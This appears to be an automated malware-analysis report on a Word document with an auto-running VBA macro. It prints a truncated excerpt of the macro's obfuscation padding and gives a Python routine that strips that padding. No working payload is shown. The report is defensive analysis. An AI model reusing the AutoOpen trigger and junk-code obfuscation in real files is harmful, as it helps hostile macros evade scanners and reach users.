Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The presence of a legacy WordBasic AutoOpen marker together with a large body of VBA macro code (44,832 bytes of decoded source) indicates a malicious document. The AutoOpen subroutine runs automatically when the document is opened with macros enabled. It starts with On Error Resume Next, and the visible portion consists entirely of padding: arrays that are filled with CLng, Sqr, Month and Fix results behind always-true guards such as If 10 = 10 + (3 * 0) Then and never read again. Several of the Month() calls take serials far outside VBA's date range and would raise an error without that handler, which is why it is there. None of this does useful work; it exists to bury the real logic and to defeat signature matching. The behaviour that matters is not visible in the truncated preview; given the macro size and the family detection, a download-and-execute second stage is the likely purpose, but this has not been confirmed from the code itself. The ClamAV detection Doc.Malware.Sagent-6697295-0 further supports the verdict. No IOCs such as URLs or file paths were directly extractable from the obfuscated script; the only URLs in the document are OOXML schema namespace identifiers, not network indicators.
Heuristics (5)

- ClamAV: Doc.Malware.Sagent-6697295-0 | critical | CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Sagent-6697295-0
- VBA macros detected | medium | OLE_VBA_MACROS: Document contains VBA macro code (1 related finding)
- AutoOpen macro | high | OLE_VBA_AUTOOPEN: AutoOpen macro; the subroutine runs automatically when the document is opened with macros enabled, which is the execution trigger for this sample
- Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that on this sample a VBA project was in fact recovered (see OLE_VBA_MACROS and the extracted macros.bas below), so this marker is corroborating evidence rather than the sole indicator.
- Embedded URL | info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
  All three are OOXML schema namespace URIs that appear in the document body, not addresses the macro contacts; they should not be treated as network IOCs.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44832 bytes | 61f4ba7f03ef84b1de76a01e9d712507de18793849fc05d145d4b350ce556d8c |

Preview script (first 1,000 lines of the extracted script; the preview is truncated):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const sAyHqoiOkODOKbaZiWEruNUTOJ = 0
Sub AutoOpen()
On Error Resume Next
Dim loNoWQuggyWENcUymELaRAq(4)
If 10 = 10 + (3 * 0) Then
loNoWQuggyWENcUymELaRAq(0) = CLng(3353)
End If
loNoWQuggyWENcUymELaRAq(1) = Sqr(3)
loNoWQuggyWENcUymELaRAq(2) = Month(33533353)
loNoWQuggyWENcUymELaRAq(3) = Fix(3353.3)
Dim hAWofIZEXiWbaoJamypyGamAhITutUMu(4)
If 10 = 10 + (6 * 0) Then
hAWofIZEXiWbaoJamypyGamAhITutUMu(0) = CLng(5730)
End If
hAWofIZEXiWbaoJamypyGamAhITutUMu(1) = Sqr(6)
hAWofIZEXiWbaoJamypyGamAhITutUMu(2) = Month(57305730)
hAWofIZEXiWbaoJamypyGamAhITutUMu(3) = Fix(5730.6)
Dim VYDAcAkepEUqSoBUTEwFyQasY(4)
If 13 = 13 + (2 * 0) Then
VYDAcAkepEUqSoBUTEwFyQasY(0) = CLng(5701)
Dim JuQOSAPoCYCObheVxokUGAqECyxAMIZor(4)
If 10 = 10 + (9 * 0) Then
JuQOSAPoCYCObheVxokUGAqECyxAMIZor(0) = CLng(2792)
End If
JuQOSAPoCYCObheVxokUGAqECyxAMIZor(1) = Sqr(9)
JuQOSAPoCYCObheVxokUGAqECyxAMIZor(2) = Month(27922792)
JuQOSAPoCYCObheVxokUGAqECyxAMIZor(3) = Fix(2792.9)
End If
Dim lykYcAfNIssAheiOnEVIbUSyMoLA(4)
If 10 = 10 + (8 * 0) Then
lykYcAfNIssAheiOnEVIbUSyMoLA(0) = CLng(3602)
End If
lykYcAfNIssAheiOnEVIbUSyMoLA(1) = Sqr(8)
lykYcAfNIssAheiOnEVIbUSyMoLA(2) = Month(36023602)
lykYcAfNIssAheiOnEVIbUSyMoLA(3) = Fix(3602.8)
Dim KoqURacNYRAaUnIbusAxiwjiXaLUxEQyqEgyB(4)
If 12 = 12 + (5 * 0) Then
KoqURacNYRAaUnIbusAxiwjiXaLUxEQyqEgyB(0) = CLng(7599)
End If
KoqURacNYRAaUnIbusAxiwjiXaLUxEQyqEgyB(1) = Sqr(5)
KoqURacNYRAaUnIbusAxiwjiXaLUxEQyqEgyB(2) = Month(75997599)
KoqURacNYRAaUnIbusAxiwjiXaLUxEQyqEgyB(3) = Fix(7599.5)
VYDAcAkepEUqSoBUTEwFyQasY(1) = Sqr(2)
Dim DAdumaBaCinEHuRnygiSEKasOlAsAk(4)
If 12 = 12 + (8 * 0) Then
DAdumaBaCinEHuRnygiSEKasOlAsAk(0) = CLng(5306)
End If
DAdumaBaCinEHuRnygiSEKasOlAsAk(1) = Sqr(8)
DAdumaBaCinEHuRnygiSEKasOlAsAk(2) = Month(53065306)
DAdumaBaCinEHuRnygiSEKasOlAsAk(3) = Fix(5306.8)
Dim xxYboBaaAlqYdovGuFogAQapAxOia(4)
If 11 = 11 + (2 * 0) Then
xxYboBaaAlqYdovGuFogAQapAxOia(0) = CLng(4014)
End If
xxYboBaaAlqYdovGuFogAQapAxOia(1) = Sqr(2)
xxYboBaaAlqYdovGuFogAQapAxOia(2) = Month(40144014)
xxYboBaaAlqYdovGuFogAQapAxOia(3) = Fix(4014.2)
VYDAcAkepEUqSoBUTEwFyQasY(2) = Month(57015701)
VYDAcAkepEUqSoBUTEwFyQasY(3) = Fix(5701.2)
Dim DIadUpoZAPcedobAwoNUbuGEjUkAcUGEDulAkYmI(4)
If 13 = 13 + (2 * 0) Then
DIadUpoZAPcedobAwoNUbuGEjUkAcUGEDulAkYmI(0) = CLng(4766)
End If
DIadUpoZAPcedobAwoNUbuGEjUkAcUGEDulAkYmI(1) = Sqr(2)
DIadUpoZAPcedobAwoNUbuGEjUkAcUGEDulAkYmI(2) = Month(47664766)
DIadUpoZAPcedobAwoNUbuGEjUkAcUGEDulAkYmI(3) = Fix(4766.2)
Dim MYhaBonoXAQYwUTadyawenNogAJejoIrOZiLIb(4)
If 12 = 12 + (9 * 0) Then
MYhaBonoXAQYwUTadyawenNogAJejoIrOZiLIb(0) = CLng(5820)
End If
MYhaBonoXAQYwUTadyawenNogAJejoIrOZiLIb(1) = Sqr(9)
MYhaBonoXAQYwUTadyawenNogAJejoIrOZiLIb(2) = Month(58205820)
MYhaBonoXAQYwUTadyawenNogAJejoIrOZiLIb(3) = Fix(5820.9)
Dim LACEVeLOTERykISeopUrBoDEfGUFihEwenMaBa(4)
Dim TSEnaPOSipWIXUgymusudyfORikAJ(4)
If 12 = 12 + (10 * 0) Then
TSEnaPOSipWIXUgymusudyfORikAJ(0) = CLng(8050)
End If
TSEnaPOSipWIXUgymusudyfORikAJ(1) = Sqr(10)
TSEnaPOSipWIXUgymusudyfORikAJ(2) = Month(80508050)
TSEnaPOSipWIXUgymusudyfORikAJ(3) = Fix(8050.1)
If 11 = 11 + (2 * 0) Then
LACEVeLOTERykISeopUrBoDEfGUFihEwenMaBa(0) = CLng(2221)
Dim lygEnOGuPAsePYVyjyOXojeQsopGqhYaAyiyTIDa(4)
If 13 = 13 + (2 * 0) Then
lygEnOGuPAsePYVyjyOXojeQsopGqhYaAyiyTIDa(0) = CLng(5332)
End If
lygEnOGuPAsePYVyjyOXojeQsopGqhYaAyiyTIDa(1) = Sqr(2)
lygEnOGuPAsePYVyjyOXojeQsopGqhYaAyiyTIDa(2) = Month(53325332)
lygEnOGuPAsePYVyjyOXojeQsopGqhYaAyiyTIDa(3) = Fix(5332.2)
Dim dOHolEVolaprEgUXEVOioBIgySIRUjOqax(4)
If 13 = 13 + (5 * 0) Then
dOHolEVolaprEgUXEVOioBIgySIRUjOqax(0) = CLng(4803)
End If
dOHolEVolaprEgUXEVOioBIgySIRUjOqax(1) = Sqr(5)
dOHolEVolaprEgUXEVOioBIgySIRUjOqax(2) = Month(48034803)
dOHo ...
```

(truncated)
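The padding pattern in the preview above (write-only arrays filled via CLng, Sqr, Month and Fix behind always-true guards) can be stripped mechanically before an analyst reads the macro, which is how the "no IOC visible" conclusion in the summary gets verified against the full 44 KB rather than the first screen. The following Python is an added example written for this page; it is not analyzer output and not code from the sample. It constant-folds the integer guards and drops names that are declared and written but never read, and it goes a little beyond the preview: it handles nested guards and leaves a guard alone when it has an Else branch. The SAMPLE input is constructed to mirror the preview; its Dim live / MsgBox lines are a placeholder for a live statement and do not come from the sample.

```python
"""Strip the junk-code padding idiom seen in the extracted AutoOpen macro.

Added example for this page: not analyzer output and not code from the sample.
Removes always-true guards (If 10 = 10 + (3 * 0) Then ... End If) and names
that are written but never read (Dim x(4) ... x(i) = CLng(..), Const c = 0).
"""
import ast
import operator
import re
from typing import Dict, List, Optional, Tuple

_BLOCK_IF = re.compile(r"^If\s+(.+?)\s*=\s*(.+?)\s+Then$", re.IGNORECASE)
_ANY_BLOCK_IF = re.compile(r"^If\b.*\bThen$", re.IGNORECASE)
_ELSE = re.compile(r"^Else(If\b|$)", re.IGNORECASE)
_END_IF = re.compile(r"^End\s+If$", re.IGNORECASE)
_DIM_ARRAY = re.compile(r"^Dim\s+(\w+)\s*\(\s*\d+\s*\)$", re.IGNORECASE)
_CONST = re.compile(r"^Const\s+(\w+)\s*=\s*(.+)$", re.IGNORECASE)
_STORE = re.compile(r"^(\w+)\s*\(\s*\d+\s*\)\s*=\s*(.+)$")
_IDENT = re.compile(r"[A-Za-z_]\w*")
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}

# Constructed input mirroring the preview, nested guard included. The Dim live /
# MsgBox lines stand in for a live statement and are not from the sample.
SAMPLE = """\
Const sAyHqoiOkODOKbaZiWEruNUTOJ = 0
Sub AutoOpen()
On Error Resume Next
Dim loNoWQuggyWENcUymELaRAq(4)
If 10 = 10 + (3 * 0) Then
loNoWQuggyWENcUymELaRAq(0) = CLng(3353)
End If
loNoWQuggyWENcUymELaRAq(1) = Sqr(3)
Dim VYDAcAkepEUqSoBUTEwFyQasY(4)
If 13 = 13 + (2 * 0) Then
VYDAcAkepEUqSoBUTEwFyQasY(0) = CLng(5701)
Dim JuQOSAPoCYCObheVxokUGAqECyxAMIZor(4)
If 10 = 10 + (9 * 0) Then
JuQOSAPoCYCObheVxokUGAqECyxAMIZor(0) = CLng(2792)
End If
End If
Dim live(1)
live(0) = "constructed placeholder, not from the sample"
MsgBox live(0)
End Sub
"""

def const_value(expr: str) -> Optional[int]:
    """Fold an integer +, -, * expression; None if it is not a pure constant."""
    def walk(n):
        if isinstance(n, ast.Constant) and type(n.value) is int:
            return n.value
        if isinstance(n, ast.BinOp) and type(n.op) in _OPS:
            return _OPS[type(n.op)](walk(n.left), walk(n.right))
        raise ValueError("not a constant")
    try:
        return walk(ast.parse(expr.strip(), mode="eval").body)
    except (SyntaxError, ValueError):
        return None

def is_always_true(line: str) -> bool:
    """True for a block-If guard whose two sides fold to the same integer."""
    m = _BLOCK_IF.match(line.strip())
    if not m:
        return False
    lhs, rhs = const_value(m.group(1)), const_value(m.group(2))
    return lhs is not None and lhs == rhs

def _fold_trivial_guards(lines: List[str]) -> Tuple[List[str], int]:
    """Drop always-true If lines and their End If, keeping the body. A guard
    with an Else/ElseIf branch is left alone so no branch is orphaned."""
    drop, stack = set(), []  # stack entry: [if_index, trivial, saw_else]
    for i, raw in enumerate(lines):
        s = raw.strip()
        if _ANY_BLOCK_IF.match(s):
            stack.append([i, is_always_true(s), False])
        elif _ELSE.match(s) and stack:
            stack[-1][2] = True
        elif _END_IF.match(s) and stack:
            start, trivial, saw_else = stack.pop()
            if trivial and not saw_else:
                drop.update((start, i))
    return [ln for i, ln in enumerate(lines) if i not in drop], len(drop) // 2

def strip_junk(source: str) -> Dict[str, object]:
    """Return surviving lines plus counts of stripped guards and dead stores."""
    lines = [ln.rstrip() for ln in source.splitlines() if ln.strip()]
    pass1, trivial_ifs = _fold_trivial_guards(lines)
    declared, reads = set(), set()  # unclassified lines count fully as reads
    for raw in pass1:
        s = raw.strip()
        dim, const, store = _DIM_ARRAY.match(s), _CONST.match(s), _STORE.match(s)
        if dim:
            declared.add(dim.group(1).lower())
        elif const:
            declared.add(const.group(1).lower())
            reads.update(t.lower() for t in _IDENT.findall(const.group(2)))
        else:
            reads.update(t.lower() for t in _IDENT.findall(store.group(2) if store else s))
    dead = declared - reads

    def is_dead_line(raw: str) -> bool:
        s = raw.strip()
        m = _DIM_ARRAY.match(s) or _CONST.match(s) or _STORE.match(s)
        return bool(m) and m.group(1).lower() in dead

    kept = [raw for raw in pass1 if not is_dead_line(raw)]
    return {"kept": kept, "removed_trivial_ifs": trivial_ifs,
            "removed_dead_stores": len(pass1) - len(kept),
            "junk_ratio": round(1 - len(kept) / len(lines), 2) if lines else 0.0}
```

Calling strip_junk(SAMPLE) leaves six lines (the Sub header, On Error Resume Next, the placeholder statements and End Sub) and reports three folded guards and eight dead stores, a junk ratio of 0.7 even on this short input. Run against the full macros.bas the same routine separates the padding from whatever the macro actually does; anything it cannot classify is kept, so it never hides a live statement.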